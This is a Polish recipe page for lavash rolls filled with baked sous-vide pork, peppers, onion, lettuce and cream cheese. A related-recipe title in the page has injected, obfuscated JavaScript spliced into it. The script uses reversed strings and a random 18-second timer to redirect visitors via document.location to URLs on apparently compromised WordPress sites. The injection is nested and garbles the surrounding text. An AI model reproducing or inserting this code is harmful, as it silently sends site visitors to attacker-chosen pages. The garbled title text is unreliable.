parallax background

Lawasz z zapiekaną wieprzowiną

Lawasz z kurczakiem, awoka$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-re$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do i rukolą
1 października 2019
 

W yjąć mięso z opakowania foliowego i przełożyć do dołączonej aluminiowej foremki, razem z sosem(galaretką), który się wytworzył. Foremkę z mięsem umieścić w piekarniku rozgrzanym do temp. 200°C i piec przez około 40 minut. Paprykę oczyścić z nasion, umyć i pokroić wraz z cebulą w drobną kosteczkę. Sałatę umyć, porwać na mniejsze kawałki. Mięso wyjąć z piekarnika, odczekać aż ostygnie i pokroić je na kruche włókna. Placki lawasza posmarować serkiem, rozłożyć sałatę, pokrojoną paprykę i cebulkę oraz pokrojne mięso. Lawasz zwinąć w ruloniki, pokroić na kawałki o grubości ok. 2 cm, a następnie ułożyć na półmisku.

 

Składniki:

  • 1 porcja wieprzowiny przygotowanej metodą sous vide
  • 4 lawasza
  • 1 czerwona papryka
  • 1 cebula
  • sałata rzymska
  • 1 serek śmietankowy
 

Komentarze są wyłączone.